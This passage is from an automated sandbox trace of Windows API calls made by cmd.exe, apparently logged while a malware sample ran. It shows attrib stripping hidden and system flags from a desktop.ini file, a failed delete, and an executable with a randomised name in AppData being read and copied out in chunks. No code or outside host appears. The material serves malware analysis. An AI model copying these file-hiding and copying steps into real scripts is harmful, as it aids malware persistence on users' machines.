"c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.937] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af27c | out: lpFindFileData=0x2af27c) returned 0x330c38 [0220.937] FindClose (in: hFindFile=0x330c38 | out: hFindFile=0x330c38) returned 1 [0220.937] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af27c | out: lpFindFileData=0x2af27c) returned 0x330c38 [0220.937] FindClose (in: hFindFile=0x330c38 | out: hFindFile=0x330c38) returned 1 [0220.937] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af27c | out: lpFindFileData=0x2af27c) returned 0x330c38 [0220.937] FindClose (in: hFindFile=0x330c38 | out: hFindFile=0x330c38) returned 1 [0220.937] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.937] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.937] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.937] GetEnvironmentStringsW () returned 0x330458* [0220.938] FreeEnvironmentStringsW (penv=0x330458) returned 1 [0220.938] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.938] GetConsoleOutputCP () returned 0x1b5 [0220.938] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.938] GetUserDefaultLCID () returned 0x409 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af640, cchData=128 | out: lpLCData="0") returned 2 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af640, cchData=128 | out: lpLCData="0") returned 2 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af640, cchData=128 | out: lpLCData="1") returned 2 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.940] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.940] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.940] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.941] GetConsoleTitleW (in: lpConsoleTitle=0x320a98, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.941] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.941] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.941] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.941] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.942] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0220.942] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0220.942] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0220.942] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0220.942] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0220.942] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0220.942] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0220.944] _wcsicmp (_String1="del", _String2=")") returned 59 [0220.944] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0220.944] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0220.944] _wcsicmp (_String1="IF", _String2="del") returned 5 [0220.945] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0220.945] _wcsicmp (_String1="REM", _String2="del") returned 14 [0220.945] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0220.947] _wcsicmp (_String1="type", _String2=")") returned 75 [0220.947] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0220.947] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0220.947] _wcsicmp (_String1="IF", _String2="type") returned -11 [0220.947] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0220.947] _wcsicmp (_String1="REM", _String2="type") returned -2 [0220.947] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0223.044] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0223.044] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0223.050] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0223.051] FindClose (in: hFindFile=0x330638 | out: hFindFile=0x330638) returned 1 [0223.052] FindClose (in: hFindFile=0x330638 | out: hFindFile=0x330638) returned 1 [0223.052] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0223.052] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0223.052] GetConsoleTitleW (in: lpConsoleTitle=0x2af068, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0223.052] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aeef0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aefb8 | out: lpAttributeList=0x2aeef0, lpSize=0x2aefb8) returned 1 [0223.052] UpdateProcThreadAttribute (in: lpAttributeList=0x2aeef0, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aefb0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aeef0, lpPreviousValue=0x0) returned 1 [0223.052] GetStartupInfoW (in: lpStartupInfo=0x2aeeac | out: lpStartupInfo=0x2aeeac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0223.052] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0223.053] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aef4c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aef98 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" ", lpProcessInformation=0x2aef98*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd2c, dwThreadId=0xd10)) returned 1 [0223.061] CloseHandle (hObject=0x4c) returned 1 [0223.061] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0223.061] GetEnvironmentStringsW () returned 0x330878* [0223.061] FreeEnvironmentStringsW (penv=0x330878) returned 1 [0223.061] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0223.241] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2aee8c | out: lpExitCode=0x2aee8c*=0x0) returned 1 [0223.241] CloseHandle (hObject=0x50) returned 1 [0223.241] _vsnwprintf (in: _Buffer=0x2aefd4, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aee98 | out: _Buffer="00000000") returned 8 [0223.241] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0223.241] GetEnvironmentStringsW () returned 0x332598* [0223.241] FreeEnvironmentStringsW (penv=0x332598) returned 1 [0223.241] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0223.241] GetEnvironmentStringsW () returned 0x332598* [0223.241] FreeEnvironmentStringsW (penv=0x332598) returned 1 [0223.241] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aeef0 | out: lpAttributeList=0x2aeef0) [0223.241] GetConsoleTitleW (in: lpConsoleTitle=0x2af270, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0223.242] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\desktop.ini")) returned 0xffffffff [0223.242] GetLastError () returned 0x2 [0223.242] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI" (normalized: "c:\\users\\eebsym5\\desktop\\gbki")) returned 0x10 [0223.242] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0223.242] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0223.242] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\desktop.ini")) returned 0xffffffff [0223.243] GetLastError () returned 0x2 [0223.243] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2aed1c | out: lpConsoleScreenBufferInfo=0x2aed1c) returned 1 [0223.243] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0223.245] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0223.245] GetConsoleTitleW (in: lpConsoleTitle=0x2af20c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0223.246] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0223.246] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.247] GetFileType (hFile=0x50) returned 0x1 [0223.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.247] GetFileType (hFile=0x50) returned 0x1 [0223.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.247] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.249] GetFileType (hFile=0x50) returned 0x1 [0223.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.249] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.249] GetFileType (hFile=0x50) returned 0x1 [0223.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.249] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.249] GetFileType (hFile=0x50) returned 0x1 [0223.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.249] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.249] GetFileType (hFile=0x50) returned 0x1 [0223.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.249] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.250] GetFileType (hFile=0x50) returned 0x1 [0223.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.250] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.250] GetFileType (hFile=0x50) returned 0x1 [0223.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.250] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.250] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.250] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.250] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.250] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.250] GetFileType (hFile=0x50) returned 0x1 [0223.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.250] GetFileType (hFile=0x50) returned 0x1 [0223.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.250] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.250] GetFileType (hFile=0x50) returned 0x1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.251] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.251] GetFileType (hFile=0x50) returned 0x1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.251] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.251] GetFileType (hFile=0x50) returned 0x1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.251] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.251] GetFileType (hFile=0x50) returned 0x1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.251] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.251] GetFileType (hFile=0x50) returned 0x1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.252] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.252] GetFileType (hFile=0x50) returned 0x1 [0223.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.252] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.252] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.252] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.252] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.252] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.252] GetFileType (hFile=0x50) returned 0x1 [0223.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.252] GetFileType (hFile=0x50) returned 0x1 [0223.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.252] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.252] GetFileType (hFile=0x50) returned 0x1 [0223.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.252] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] GetFileType (hFile=0x50) returned 0x1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] GetFileType (hFile=0x50) returned 0x1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] GetFileType (hFile=0x50) returned 0x1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] GetFileType (hFile=0x50) returned 0x1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] GetFileType (hFile=0x50) returned 0x1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.254] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.254] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.254] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.254] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] GetFileType (hFile=0x50) returned 0x1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] GetFileType (hFile=0x50) returned 0x1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] GetFileType (hFile=0x50) returned 0x1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] GetFileType (hFile=0x50) returned 0x1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] GetFileType (hFile=0x50) returned 0x1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.255] GetFileType (hFile=0x50) returned 0x1 [0223.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.255] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.255] GetFileType (hFile=0x50) returned 0x1 [0223.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.255] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.255] GetFileType (hFile=0x50) returned 0x1 [0223.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.255] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.255] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.255] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.255] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.255] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.255] GetFileType (hFile=0x50) returned 0x1 [0223.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.255] GetFileType (hFile=0x50) returned 0x1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] GetFileType (hFile=0x50) returned 0x1 [0223.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.256] WriteFile 